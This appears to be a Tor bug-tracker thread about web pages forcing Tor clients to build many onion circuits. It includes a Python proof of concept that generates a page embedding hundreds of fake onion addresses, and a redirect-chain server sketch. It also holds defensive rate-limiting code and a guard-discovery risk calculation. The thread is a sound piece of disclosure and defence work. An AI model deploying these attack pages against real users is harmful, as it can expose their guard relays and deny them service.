A malicious web page or an exit node* can force Tor to open too many new circuits by embedding resources from multiple .onion domains.
I could observe up to 50 new circuits per second, and a total of a few hundred circuits in less than half a minute.
The embedded HS domains don't need to exist; Tor will still open a new internal circuit for each .onion domain to download the descriptors.
I guess forcing clients to make too many circuits may enable certain attacks, even though the circuits are internal.
Maybe Tor (or Tor Browser) could cap the number of new circuits opened within a time window. I can't think of a realistic use case for loading resources from tens of different hidden services.
*: only when the connection is unencrypted HTTP
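For illustration, here is a minimal sketch of the kind of page that triggers this, assuming the attack is delivered as plain HTML. The script, the output filename, and the count of 200 are all made up for this example; the generated onion addresses are random and do not exist, which is exactly the point: the client still tries to fetch a descriptor, and builds internal circuits, for each one.

```python
#!/usr/bin/env python3
"""Hypothetical PoC generator: emit an HTML page that embeds resources from
many distinct, nonexistent v3 .onion hosts. Loading the page over Tor makes
the client attempt an HS descriptor fetch (and the internal circuits that go
with it) for every address."""
import base64
import os

NUM_ONIONS = 200  # a few hundred was enough to reproduce the report above

def fake_v3_onion() -> str:
    # 56 base32 characters, the length of a real v3 onion address.
    # These are random bytes, not valid keys, so the lookups will fail,
    # but Tor still builds circuits trying to fetch the (missing) descriptors.
    raw = os.urandom(35)
    return base64.b32encode(raw).decode().lower()[:56] + ".onion"

def build_page() -> str:
    imgs = "\n".join(
        f'  <img src="http://{fake_v3_onion()}/x.png" width="1" height="1">'
        for _ in range(NUM_ONIONS)
    )
    return f"<!doctype html>\n<html><body>\n{imgs}\n</body></html>\n"

if __name__ == "__main__":
    with open("onion_flood.html", "w") as f:
        f.write(build_page())
```

Serving the resulting file from any page (or injecting it from an exit relay on an unencrypted connection) should reproduce the burst of internal circuits described above.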
> Maybe Tor (or Tor Browser) could cap the number of new circuits opened within a time window. I can't think of a realistic use case for loading resources from tens of different hidden services.
Unlike the generic or custom-built Tor client case (CDNs and status pingers will likely customize their Tor client for performance), Tor Browser specifies a SOCKS username and password for url bar domain isolation. When this u+p is set, we should be able to safely limit the number of onion hostnames for a single SOCKS username + password to some low number (5? 10?).
Do we need a separate limit if third party hidden services are malicious and deliberately fail either HSDIR, IP, or RP attempts in a way that causes the client to retry them? Maybe there should be a total rend circuit limit per SOCKS u+p?
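As a very rough sketch of that per-credential cap (the function name, the data structure, and the limit of 10 are illustrative, not a proposed design), the check could look something like this wherever the SOCKS requests are seen:

```python
from collections import defaultdict

# Illustrative policy sketch: allow at most MAX_ONIONS_PER_IDENTITY distinct
# onion hostnames per SOCKS username+password (i.e. per first-party origin
# under Tor Browser's URL bar isolation).
MAX_ONIONS_PER_IDENTITY = 10

_seen = defaultdict(set)  # (socks_user, socks_pass) -> set of onion hostnames

def allow_onion_request(socks_user: str, socks_pass: str, hostname: str) -> bool:
    if not hostname.endswith(".onion"):
        return True  # only onion lookups are capped here
    seen = _seen[(socks_user, socks_pass)]
    if hostname in seen:
        return True  # a retry of an already-allowed onion is not a new hostname
    if len(seen) >= MAX_ONIONS_PER_IDENTITY:
        return False  # refuse: this origin already used up its onion budget
    seen.add(hostname)
    return True
```

Note that this only caps distinct onion hostnames per identity; as the question above suggests, repeated failing attempts against the same onion would need a separate circuit-count or rate limit.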
How should we proceed here? Leif suggested we introduce a Max3rdPartyOnions option to limit the number of onion addresses that an origin is allowed to cause the browser to make connections to.
Do we think this is a reasonable approach? And what should the default value be? Can we add this to our TB roadmap in some capacity?
> How should we proceed here? Leif suggested we introduce a Max3rdPartyOnions option to limit the number of onion addresses that an origin is allowed to cause the browser to make connections to.
> Do we think this is a reasonable approach? And what should the default value be? Can we add this to our TB roadmap in some capacity?
You mean this should be fixed on the browser side? It seems to me having a patch in tor makes more sense.
>> How should we proceed here? Leif suggested we introduce a Max3rdPartyOnions option to limit the number of onion addresses that an origin is allowed to cause the browser to make connections to.
>> Do we think this is a reasonable approach? And what should the default value be? Can we add this to our TB roadmap in some capacity?
> You mean this should be fixed on the browser side? It seems to me having a patch in tor makes more sense.
After some more discussion, let's try to fix this on the browser side (first). mcs/brade: can you look into it?
Why limit the number of onion addresses that can be embedded instead of limiting the number of circuits that can be created for onions in a single origin?
> Why limit the number of onion addresses that can be embedded instead of limiting the number of circuits that can be created for onions in a single origin?
The former should be relatively easy to implement in Tor Browser, while the latter would presumably be much more difficult and error prone (if implemented by monitoring circuit events on the control port). The simple approach of limiting the number of onions seems like it would indirectly limit the number of circuits, but reading the above question I'm suddenly having doubts. (How quickly can Tor Browser cause more circuits to be made by continually retrying just one onion that is failing to rendezvous?)
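One way to put a number on that parenthetical question is to watch CIRC events on the control port while loading a test page. A minimal sketch using the stem library (the control port 9051, cookie authentication, and the one-second reporting window are assumptions about the local setup):

```python
import time
from collections import Counter

from stem import CircStatus
from stem.control import Controller, EventType

# Count newly launched circuits per second, broken down by purpose,
# while a suspect page is loading in Tor Browser.
counts = Counter()

def on_circ(event):
    if event.status == CircStatus.LAUNCHED:
        counts[event.purpose] += 1

with Controller.from_port(port=9051) as controller:
    controller.authenticate()  # assumes cookie auth or no control password
    controller.add_event_listener(on_circ, EventType.CIRC)
    while True:
        time.sleep(1)
        if counts:
            print(dict(counts))  # e.g. {'HS_CLIENT_HSDIR': 42, ...}
        counts.clear()
```

Counting LAUNCHED events by purpose separates ordinary circuits from the HS_CLIENT_* ones created by descriptor fetches and rendezvous attempts, so repeated retries of a single failing onion would show up directly.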
>> Why limit the number of onion addresses that can be embedded instead of limiting the number of circuits that can be created for onions in a single origin?
> The former should be relatively easy to implement in Tor Browser, while the latter would presumably be much more difficult and error prone (if implemented by monitoring circuit events on the control port). The simple approach of limiting the number of onions seems like it would indirectly limit the number of circuits, but reading the above question I'm suddenly having doubts. (How quickly can Tor Browser cause more circuits to be made by continually retrying just one onion that is failing to rendezvous?)
Good question. I think we can spend some time figuring that out so we can come up with a good plan for fixing this bug.
> After some more discussion, let's try to fix this on the browser side (first). mcs/brade: can you look into it?
Yes, we can take a look. It would be helpful to develop a better understanding of what kind of attack(s) we are trying to prevent. That might lead to a better design. For example, do we want to limit the rate at which new circuits can be opened or do we just want to refuse to open more than N circuits per site? Unfortunately, Kathy and I don't really know enough about tor and the Tor Network to do that kind of analysis, so hints about what should be done would be greatly appreciated.
Here is another attack, from arma on IRC: an attacker could also set up an onion address that redirects you to another onion address, which redirects you to another onion address, ad infinitum. This lets the attacker cause n onion loads in series, and if each page also embeds k onions, the attacker can cause n*k onion loads in total. That's both an optimization and a way to work around any defences that try to restrict onion address loads per origin.
Furthermore, depending on how stream isolation works, the above attack could also work with IPs/domain addresses and not just onions.
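For concreteness, one hop of such a redirect chain could be as simple as the sketch below, assuming the attacker runs a trivial HTTP service behind each onion in the chain (all addresses and the k = 20 figure are placeholders): the page embeds k further onions, and a meta refresh then moves the browser on to the next onion.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Hypothetical service behind one onion in the chain: the page embeds k further
# onions, then a meta refresh sends the browser on to the next onion in the chain.
NEXT_ONION = "nextonionaddressplaceholder.onion"  # placeholder, not a real address
EMBEDDED_ONIONS = [f"embedded{i}placeholder.onion" for i in range(20)]  # k = 20

PAGE = (
    "<!doctype html><html><head>"
    f'<meta http-equiv="refresh" content="5;url=http://{NEXT_ONION}/">'
    "</head><body>"
    + "".join(f'<img src="http://{o}/x.png">' for o in EMBEDDED_ONIONS)
    + "</body></html>"
).encode()

class ChainHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(PAGE)))
        self.end_headers()
        self.wfile.write(PAGE)

if __name__ == "__main__":
    # The attacker would publish a variant of this behind each onion in the chain.
    HTTPServer(("127.0.0.1", 8080), ChainHandler).serve_forever()
```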
>> Why limit the number of onion addresses that can be embedded instead of limiting the number of circuits that can be created for onions in a single origin?
> The former should be relatively easy to implement in Tor Browser, while the latter would presumably be much more difficult and error prone (if implemented by monitoring circuit events on the control port). The simple approach of limiting the number of onions seems like it would indirectly limit the number of circuits, but reading the above question I'm suddenly having doubts. (How quickly can Tor Browser cause more circuits to be made by continually retrying just one onion that is failing to rendezvous?)
I opened #25609 (moved) to investigate the issue raised in the parenthetical question at the end of the quoted post. It's important because if an attacker can cause Tor to make many circuits by continuously retrying a broken onion, this can bypass any sort of origin rate-limiting defense.
Since the DoS mitigation system exists, when this happens the DoS mitigation will make your client IP unusable at your guard for at least one hour.
IMHO the naive DoS mitigation should be disabled, since the DDoS has stopped.
Reviving this ticket and marking it as s27-must. Marking for 6 points since we need to figure out how to do this. Marking #29995 (moved) as its parent, but it could also go under #29999 (moved) just as easily.
We might need some fixes in Tor, and some fixes in Tor Browser.
If we make all (non-single onion service) clients rate-limit onion circuits, then some applications may need to rate-limit individual tabs (Tor Browser), contacts (Ricochet), or peers (Bitcoin).
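To make the shape of such an application-level limit concrete, here is a rough token-bucket sketch keyed on the isolation identity (a SOCKS username+password for Tor Browser, a contact for Ricochet, a peer for Bitcoin); the bucket size and refill rate are made-up numbers, not proposed defaults:

```python
import time
from collections import defaultdict

# Illustrative token-bucket limiter: each isolation key gets a small budget of
# onion circuit launches that refills slowly over time.
BUCKET_SIZE = 10          # burst allowance (made-up number)
REFILL_PER_SECOND = 0.2   # one new circuit every 5 seconds on average (made-up)

_buckets = defaultdict(lambda: {"tokens": BUCKET_SIZE, "last": time.monotonic()})

def allow_onion_circuit(isolation_key) -> bool:
    bucket = _buckets[isolation_key]
    now = time.monotonic()
    bucket["tokens"] = min(
        BUCKET_SIZE, bucket["tokens"] + (now - bucket["last"]) * REFILL_PER_SECOND
    )
    bucket["last"] = now
    if bucket["tokens"] >= 1:
        bucket["tokens"] -= 1
        return True
    return False  # over budget: defer or refuse the onion circuit for this key
```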
> We might need some fixes in Tor, and some fixes in Tor Browser.
> If we make all (non-single onion service) clients rate-limit onion circuits, then some applications may need to rate-limit individual tabs (Tor Browser), contacts (Ricochet), or peers (Bitcoin).
Yep. I was thinking that an initial MVP here could be to just improve the situation in Tor Browser for now. The benefit here is that we can gear the defence to just web users, so that we don't have to think about all the possible applications that use onions.
Still, that seems pretty hard to do:
Here is a version of the attack: the attacker makes many different evil onions with different traffic patterns. The attacker also sets up some middle nodes around the network. The attacker forces the victim to visit the onions (in a hidden iframe or through redirects or whatever), and then checks their middle nodes for the given traffic patterns. If we assume that the "confirm traffic patterns" step is instant and accurate, then an attacker that runs 5% of the middle node capacity can get a 50% chance of guard discovery after about 14 circuits (also see the prop292 calculations)... So this looks pretty bad...
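To spell out the arithmetic behind that figure: if the adversary holds a fraction c = 0.05 of middle capacity and each circuit picks its middle independently, the probability that n circuits all avoid the adversary is (1 - c)^n, so guard discovery reaches 50% once 1 - (1 - c)^n >= 0.5. A quick check:

```python
import math

c = 0.05  # adversary's share of middle-node capacity
# Smallest n with 1 - (1 - c)**n >= 0.5, i.e. n >= log(0.5) / log(1 - c)
n = math.ceil(math.log(0.5) / math.log(1 - c))
print(n)                 # 14
print(1 - (1 - c) ** n)  # ~0.512, just over a coin flip
```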
The good part is that the attacker needs to persuade the victim to visit their website (not so hard), and the victim also has to leave the tab open for as long as the attack needs to succeed.
Still, it's hard to rate-limit this enough to block 5% adversaries without also blocking legitimate websites (especially if, in the future, onions become more prevalent and well connected)...